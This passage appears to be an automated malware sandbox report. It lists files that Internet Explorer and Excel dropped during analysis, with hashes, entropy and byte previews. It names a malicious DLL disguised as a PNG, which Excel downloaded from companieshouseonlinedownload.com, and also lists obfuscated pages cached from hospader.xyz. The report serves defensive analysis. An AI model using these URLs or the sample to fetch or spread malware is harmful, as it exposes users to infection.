                        Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1786
                        Entropy (8bit):7.366016576663508
                        Encrypted:false
                        SSDEEP:48:3ntmD5QQD5XC5RqHHXmXvp++hntmD5QQD5XC5RqHHXmXvp++x:3AJ8RAXmXvcOAJ8RAXmXvcu
                        MD5:6AEB4E76C6F68EFD7A48092E9F0F3492
                        SHA1:823A035C0BDCC3DC09C881E788F7FACA53C6B458
                        SHA-256:FE1B9A0EABF44FDBE4DDE97C3CC1209FAD2FBB2D2D7476FFBF64066BD9919A4F
                        SHA-512:50D98FB4C9875B1AED0AEC06A9C934DB5010B6C5F54539E323EC14FD487E1D92D01652E4614DDF308AB2F1EDEA9E9CB1E23030C971255CC106016C6E7BBAF48C
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Dig
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.126037102673156
                        Encrypted:false
                        SSDEEP:12:bkPlE99SNxAhUegeT9kPlE99SNxAhUegeT2:bkPcUQU769kPcUQU762
                        MD5:9FE6EC7AF7A771A5465B9C429223A77B
                        SHA1:77BC291657A30BFD37EC9854E1EF180CF041E85A
                        SHA-256:59ED067380B844F51E5F08229329A3598BFA02334AAE6BB0370758C532F38EF2
                        SHA-512:898CEA71EC57FC22BE2DB2A1AB7E859F9EAB6325B2BE9573C7F73EE72D5F5C41BBCDBD22E62F0145693CC23F5688BEFB4E97CBB1A65E95FEEE67ABEC3DC58CF7
                        Malicious:false
                        Reputation:low
                        Preview: p...... ........0...~...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...p...... ........P...~...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):504
                        Entropy (8bit):3.0413682343734383
                        Encrypted:false
                        SSDEEP:6:kK6liBAIdQZV7eAYLiWK6PliBAIdQZV7eAYLit:ylidKOJlidKOe
                        MD5:0E47BE2C181ED597A3D9EAFE5D6DBBBD
                        SHA1:E23AE49D778A973D8EAF6CE4879B3B1C247DB505
                        SHA-256:F56F2A329494ED55EF6E27629EDE2FDDADD19AC98EC480F400A3DF63A7122E9F
                        SHA-512:2E76406B3A1C9046DE53E1194905208098E65BD0B90628B0E8D51DF7DAA6C35E56CDE9620510D4089E720BFB866B73775E8F5A78C8065C7426B439914B1A2CC2
                        Malicious:false
                        Reputation:low
                        Preview: p...... ....`...H...~...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...p...... ....`.......~...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                        C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
                        Process:C:\Program Files\Internet Explorer\iexplore.exe
                        File Type:PNG image data, 16 x 16, 4-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):237
                        Entropy (8bit):6.1480026084285395
                        Encrypted:false
                        SSDEEP:6:6v/lhPIF6R/C+u1fXNg1XQ3yslRtNO+cKvAElRApGCp:6v/7b/C1fm1ZslRTvAElR47
                        MD5:9FB559A691078558E77D6848202F6541
                        SHA1:EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
                        SHA-256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
                        SHA-512:0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview: .PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d...-PLTE......(..5..X..h...........................J4.I...IIDAT.[c`..&.(.....F....cX.(@.j.+@..K.(..2L....1.{.....c`]L9.&2.l...I..E.......IEND.B`.
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5591F91C-4571-11EB-ADCF-ECF4BBB5915B}.dat
                        Process:C:\Program Files\Internet Explorer\iexplore.exe
                        File Type:Microsoft Word Document
                        Category:dropped
                        Size (bytes):42152
                        Entropy (8bit):1.9832934336332197
                        Encrypted:false
                        SSDEEP:48:IvpGcpU0Gwp0k1G/apnkPKrGIpHkPNgGvnZpEkPNoloGoYVqpqkPNoKvGo4Es5pP:MvKMKwp19JmaDk0vR3ZRGo7536eT8PW
                        MD5:8F6C3B20FC4351C7BA4BDCD3E1A3672E
                        SHA1:958EE2FECDB61FC960C639FDB8224BC1AE20A9E3
                        SHA-256:E7C6E80294FE56986DE73B144999A7233D68EA4993CA312E7C89411CFEA26433
                        SHA-512:2221BBA9A3D8F7614CA80600E00EF7C6847085F8C88AAF95441219F753EB12050CEE2A432E29E4EFDAFFDDDDDF6CC7D02010CFE0B182E15FB45DA020AEBD1258
                        Malicious:false
                        Reputation:low
                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5591F91E-4571-11EB-ADCF-ECF4BBB5915B}.dat
                        Process:C:\Program Files\Internet Explorer\iexplore.exe
                        File Type:Microsoft Word Document
                        Category:dropped
                        Size (bytes):26248
                        Entropy (8bit):1.6612659629621438
                        Encrypted:false
                        SSDEEP:48:IvjGcpU6GwpNS7G4pP+GrapgSUrGQpC2GHHpnpsTGUpHcGzYp1SlcYGopJ8ZyGAS:MZKibSdJweSUFc1ppkJIzqcYPb/q+VA
                        MD5:E06EA0253179EED5DBC53707B56F8A92
                        SHA1:E6CD968CD8285296327A6D986077757419FA6061
                        SHA-256:0B99754A6ED1E19B185295789F5C972187BE914E12307033FBFEAA09D3D2912F
                        SHA-512:886501DDA768200C7AB3BBA6449A34F0631A3DDF24B7F5CBD1482756A8D637DF4BF77F156DE1663EDBA4D451B34162B9811185A01D201AC1F5D4CCB3A14F98C4
                        Malicious:false
                        Reputation:low
                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5591F920-4571-11EB-ADCF-ECF4BBB5915B}.dat
                        Process:C:\Program Files\Internet Explorer\iexplore.exe
                        File Type:Microsoft Word Document
                        Category:modified
                        Size (bytes):21592
                        Entropy (8bit):1.6170895031774963
                        Encrypted:false
                        SSDEEP:48:IvtGcpUkGwpNAG4pPQGrapgSIXrGQpCiGHHpnMsTGUpHhWGzYp1i+YGopb:MzKcbgJueSIFc5pMkJhazTYB
                        MD5:7A5C0CBBB6BBCB9565F340E31F8EE086
                        SHA1:441E82533DB58126C3E0E9FCBE68DC0829569DB8
                        SHA-256:ED9473E7AD871E68F006D814539108459787A6B48A01494593E83CC23B89DFC3
                        SHA-512:B1F36EBAA298A47527F566EED303D19F913A6D6FFBDB2E61AED0EA4C7EC0D49E8DBCF11E79DDA6F2D4B12C63A353EDDC636E6E7C3839DDC7F2402C9D472B7E27
                        Malicious:false
                        Reputation:low
                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\lr5drzg\imagestore.dat
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:data
                        Category:modified
                        Size (bytes):420
                        Entropy (8bit):3.3453148669341766
                        Encrypted:false
                        SSDEEP:12:jcMplkyw/3cAorQQQQQPR6V6V6V6V6DrFFFFC:jznw3BLkFFFFC
                        MD5:B2402A0EA964074E6E4F121C98EB9DF4
                        SHA1:94A7BC703916FB746D79C0B1E80D7659541CFB06
                        SHA-256:20D9719CE824852A228E78BB6FA61C7C9CCF1D65A0C4BCB0759BE2CF205FBDF3
                        SHA-512:D7B39D3C131D5F29F718145BEE7EFB138A5A7AA3986B857531E077A274038EBC5C4EA64D329A8DD7B728E46384FADBB6C031732F4B897FDB5A29625B158CC249
                        Malicious:false
                        Reputation:low
                        Preview: .h.t.t.p.s.:././.h.o.s.p.a.d.e.r...x.y.z./.f.a.v.i.c.o.n...i.c.o.>.................(.......(....... ................................C.......s..............................................................................................................................331.""!.331.""!.331.""!.331.""!.331.""!.331.""!..........................................................................................._......._....
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\index[1].htm
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:ASCII text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):16123
                        Entropy (8bit):5.997516323904779
                        Encrypted:false
                        SSDEEP:384:3L1HLJ6qdD5YXSxp+hJSKFzuqUOiXtj9lQSC1UwrRsBKO:71F6SDeW+1FwOyVPC1nrW8O
                        MD5:A297353D64963C970FA560C345170869
                        SHA1:2EEAC3FFB9880AF4157F5F3FD4011A916A6A2D4F
                        SHA-256:6D4A0ABE135CE49002A65447ABD03D5992B321315D16E061D303A6F38DD10B83
                        SHA-512:BF05E69DA7739B03C42D3F36676D431A74513FB29AA040B7E99A0A44F8DF195D175B6D81F31A79936ECA877B26E65D633E00E39DF8165E0346E55D572276FC4F
                        Malicious:false
                        Preview: O9V46wB7DDp4ZHcEWJ0kKzydWdUNcEoF1BpTszoM0HMV8aPdT85NsIitrYx0oBNCM1wfIkwVqViwHrcSiigv7jY8L874pYrcJ6aKr81zcIDuGRAAbKIOM3ApPpCodk+JV3DD9I32T6fCbr0AiuNoeuBTmTdrTowFRWGUeR6q3hkyZ/s5PBX00uHeFm1CAL0cR43ZqvhbBsOHLf7AjaxylVOHdLrTsaWoYyYBg2aGLbP6GjLDX9Pu8EyKxzmlS8Z0lmOzolMV1dI7e7dRgmkE/3tqfj/CkX8IICMKl3fYoP+zyDeU/inzL8k6pkk3Vi+888TOtbONbHtw3hysAgIC8vXvtFdX4DnfzYInEzj+MqTyb2ntDOhLJWfFkhK1HXnvhlL8stuR9CvmLmeDonReqdGc1TRvfx7rCfcV4oHZmXC41Ko/43+c+hnEY+8SrRfblCh8zXotaKQwoCK8NtMnp51R54KGBx4pCp1zySkiF8fE2pS3V9ia1YDXv/tfqrQeJxpR9cHxbAeGfv0v3o9AbW984EtA8sAD+r8CSLalnO60d99EhFFN3dkr4Wa4IHePnY3rV/boEGLwzS1TFudwdnJAb5qrErCjYYAUKspqqKlb5hknQWIA5zEtuoIb/8zqxkh5mUvq8pxIixdYI052gHAlu4CNFcSXdxsAyCQVGWdnwQNcNXKrbfZEsE6aVQkN6u8A2KMLWBnb/fzzEEi0PrCMY15DwpPECkoMZ9FeEcpDK2DYmWaY0uXPpQKruu8LU2VHCrAo6Q5YTcCCLI41YjRiOvkcnMQgDRNaA1souAxRIOoZpNIPUHSiMk+7NwhnAi9KCBuIBMbdX6TDi7KYAuSi5FkZaXekj8GcmXi8T1DdQ6BujK8/+H8+6a3C90UUpNfSwkW+lXlc+daZqiKWaSJyE+8gg4zScfjr78xQHr/FNUI8VlnSWI6BDrASpg1Jo0vrL+TmomRPL6JCdRSkurfrgOEKS9kFGv49tIrY
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].png
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:downloaded
                        Size (bytes):238592
                        Entropy (8bit):6.175489362185205
                        Encrypted:false
                        SSDEEP:6144:bzLqexzY3mXAJ3WhC6aBpF7lZUPp0lts1BPz+A/OKwVdJ:bzLqmzDAEhCpTdS0Ls/UndJ
                        MD5:68CF96F4BC91628E22E1526D9728990B
                        SHA1:A1E1063EC8C3667E86E1AFAB81CB6BBEA84485B3
                        SHA-256:790191B70550856B3E8EC108FDB82CD8D852822D6716EC865F21CFB5AD160B7C
                        SHA-512:CA6BB734DF8BF35A2F3346FF5AD954ECC058A719B0EABF90D8C323B80ED6B8659CEF5B5F51F65B149C48435BC396920549A72471B0CDE1D70A02BF59DBF37B24
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 8%
                        IE Cache URL:http://companieshouseonlinedownload.com/ox9.png
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D...%...%...%..:...%..n9...%..:...%...]X..%......%...%..%...]O..%...]Y..%...w_..%...]Z..%..Rich.%..........................PE..L...YL.[...........!......... ..........................................................................................K...d...d.......`.......................H.......................................................X............................text...$........................... ..`.rdata..[...........................@..@.data...............................@....rsrc...`...........................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\favicon[1].ico
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:MS Windows icon resource - 1 icon, 16x16, 16 colors, 4 bits/pixel
                        Category:downloaded
                        Size (bytes):318
                        Entropy (8bit):2.9762388849626085
                        Encrypted:false
                        SSDEEP:6:8zE/3cAoVNONONONONONuIIIIKNX6V6V6V6V6DrFFFFR:8w/3cAorQQQQQPR6V6V6V6V6DrFFFFR
                        MD5:A976D227E5D1DCF62F5F7E623211DD1B
                        SHA1:A2A9DC1ABDD3D888484678663928CB024C359EE6
                        SHA-256:66332859BD8E3441A019E073A318B62A47014BA244121301034B510DC7532271
                        SHA-512:6754D545F2CE095CFA1FA7CA9E3223F89E37726EE7E541EBCF3E209E18B2602F3BE8677598CB30D697327A63DE032C11DBF8EF7AD7889A79C488A21044C1CB3F
                        Malicious:false
                        IE Cache URL:https://hospader.xyz/favicon.ico
                        Preview: ..............(.......(....... ................................C.......s..............................................................................................................................331.""!.331.""!.331.""!.331.""!.331.""!.331.""!........................................................................
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:ASCII text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):1376
                        Entropy (8bit):5.556217650885369
                        Encrypted:false
                        SSDEEP:24:SYgwxCzXbuSGe42+uFyL7QrX7rWKuhKViE93WILu4bKWH5eoR/PlBiW:wiCXuSGe43uFX7r5uh893za4bzeo1TiW
                        MD5:6BD04187F24F82F5AE33F86F4D97BDC7
                        SHA1:445C2C59054293E1BF30CFA9953FF9DEC5EEC24D
                        SHA-256:55E11BA82FEE0CC7A9910975340376E9A787BA086E90637D1231C0E34D24087B
                        SHA-512:2224A5BAF6BC18D4929F7928878C8348160AC6ABF533EF7B92F980A726BB0C4A5E3675163661337087A0FFC4597D287B4B0525388FEDADFCA1E113CBB47D3A9C
                        Malicious:false
                        Preview: OTkzNDQzMDdKTWJyUXlSR3ZYWkhDZEc5bHBPczNWRkY2YnpFaWFha3hrSHpXZkNVV0VreGVrQTBDdUIyMGwwMHV6NXl6WHZ1MTI1MzZDczlCRmFIWUhyejUzQmU1YnMwTmpMckhTRnJ0Sk5LYXBhSVUwc2ZiWnVIMXRCSnVSMEsxRm14UFZxbnNsOGwyTzFaYmFldUlxWmtBczFFMm1kaU83RVpYUFA2aWJTVWJyU3JwTVI4QnpzaDVPaGhDS0J1TUx0QlJldmtENDJTOHhYMEpNV0xZZkZHUVIxVmNuVXhpWjJ4dngwNXNtVnNNN2VxQUVDYUl5Rk9LbVBUaDJjTXQ1VmRPaG1pY2FZc3pHV3duVmN5dWxHY3JQWjhTM0t5MUs5R1RzTVljelRsQ2x0WUN5MVYzMlNrQWZuOGt0cGlBS05tYjE4Y1ZxUkMzVmtFejZQbE4zMHhacnhuOWVZWUJuUWNiZDVHeDJHVU1qN3d3YmJGNjJaak1JZ1JTZnlGdEVMVklHV0J4bHdUT0RLN3JiNGljdGR3dUdQUDZXWHBHb0FOT0xiRjBMc3MxNU1CYUtpekVPYXRZS0Z0V2lnU2x3Y00yVWZTQXlxVExlQ2NNZmx5a3pPMU96Ykx1Z3dmbVpER0kyWWhNS1h3bzczR2J3UzlJclFocTh3dzhqeVBENnc0WGxnelNFaWRNQVlMVHN4dHA4UGFGR1N3NGpMVFBZVzZCR3RiWHdGUnBUM0oyeDBoeDZTN1ZaalVzMEdKNDFkeldnbzRyZ3BXTFFFc1VENEw4NGFJVmoyZUl4TDlEc2cxZnBYMHAycHRMbXd3WXBYMng0bHc5eGRuZkNtc1o5RktQNFZMUEd5RTRuVkg0V0xjVW1ETjhHdzNuNlpueE04ZTFacVNMT0hVNXlWMWlZeXR6UDFnWDE4amhDTlM0WUJxdXl6RHlHRHB1c2Naa0xUVFk1VUhIQ3V3YjI2bUJDMlBQb3h4Nk03UWx2
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\favicon[1].ico
                        Process:C:\Program Files\Internet Explorer\iexplore.exe
                        File Type:PNG image data, 16 x 16, 4-bit colormap, non-interlaced
                        Category:downloaded
                        Size (bytes):237
                        Entropy (8bit):6.1480026084285395
                        Encrypted:false
                        SSDEEP:6:6v/lhPIF6R/C+u1fXNg1XQ3yslRtNO+cKvAElRApGCp:6v/7b/C1fm1ZslRTvAElR47
                        MD5:9FB559A691078558E77D6848202F6541
                        SHA1:EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
                        SHA-256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
                        SHA-512:0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
                        Malicious:false
                        IE Cache URL:http://www.bing.com/favicon.ico
                        Preview: .PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d...-PLTE......(..5..X..h...........................J4.I...IIDAT.[c`..&.(.....F....cX.(@.j.+@..K.(..2L....1.{.....c`]L9.&2.l...I..E.......IEND.B`.
                        C:\Users\user\AppData\Local\Temp\0CDE0000
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):307860
                        Entropy (8bit):7.98827510309618
                        Encrypted:false
                        SSDEEP:6144:tn9nZrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+M9mR:t9nZFPM8R3AsB+bjej/9cV
                        MD5:E682C5BD11DE1F36003FEEF9DB78649D
                        SHA1:220B7A29D4F9776ED855D5E7B76CE534FB0E4660
                        SHA-256:1B7684539C4981A8D646949512CC3363B20B8A478F89AA2AE7A6307D613F6F90
                        SHA-512:3FCF6FB39B21598FF3D505986F27DA752B80E051A81E3051AEF6C4C5F9C5B64D0D1E4A6ED0BEE6AA25D6277768DB15C5A17B589705481AB9C7AFF2A05E5B10A8
                        Malicious:false
                        Preview: .U[O.0.~.....uJ\x@.j..c.......ib.7.....c7d[U........r>.....3...m.Y3c.Z.]...~..Y..X..Yl..#.Z|.2..z...mlY....<.....y.4.r.@...q.b.......g..T........'......,.e...,.2.^+....g+.Dj.Z)..'C.M..A..1....H1.cJTXd......2.s.?.....d..CC.RJ..(.7....9..[Z..$Vw../0...h...z..9N..4..@...."...K.4..:<.T.....;$..I.._...O.(..#....f..3....hk(..?..h.!/..'_h&..i.1.....r...}........>d..l.....} .....uO;..........#5...7...2..D.!)....2*R[......x.(.h.r.-~.......PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Temp\Cab1CE2.tmp
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                        Category:dropped
                        Size (bytes):58936
                        Entropy (8bit):7.994797855729196
                        Encrypted:true
                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                        MD5:E4F1E21910443409E81E5B55DC8DE774
                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                        Malicious:false
                        Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                        C:\Users\user\AppData\Local\Temp\Cab1D23.tmp
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                        Category:dropped
                        Size (bytes):58936
                        Entropy (8bit):7.994797855729196
                        Encrypted:true
                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                        MD5:E4F1E21910443409E81E5B55DC8DE774
                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                        Malicious:false
                        Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                        C:\Users\user\AppData\Local\Temp\Tar1CE3.tmp
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):152533
                        Entropy (8bit):6.31602258454967
                        Encrypted:false
                        SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                        MD5:D0682A3C344DFC62FB18D5A539F81F61
                        SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                        SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                        SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                        Malicious:false
